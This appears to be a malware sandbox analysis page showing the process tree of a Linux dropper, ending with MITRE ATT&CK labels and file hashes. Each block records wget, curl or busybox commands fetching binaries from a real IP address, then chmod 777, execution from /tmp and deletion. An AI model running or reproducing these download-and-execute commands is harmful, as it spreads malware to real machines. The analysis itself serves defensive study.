/usr/bin/curlcurl -O http://87.120.84.230/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:880
-
-
/bin/chmodchmod 777 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo./S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:886
-
-
/bin/chmodchmod 777 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq./q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:892
-
-
/bin/chmodchmod 777 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ./qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:898
-
-
/bin/chmodchmod 777 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW./7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:906
-
-
/bin/chmodchmod 777 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd./e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:912
-
-
/bin/chmodchmod 777 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV./OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:918
-
-
/bin/chmodchmod 777 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB./d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:924
-
-
/bin/chmodchmod 777 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb./2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:930
-
-
/bin/chmodchmod 777 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU./zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:936
-
-
/bin/chmodchmod 777 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj./TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:939
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97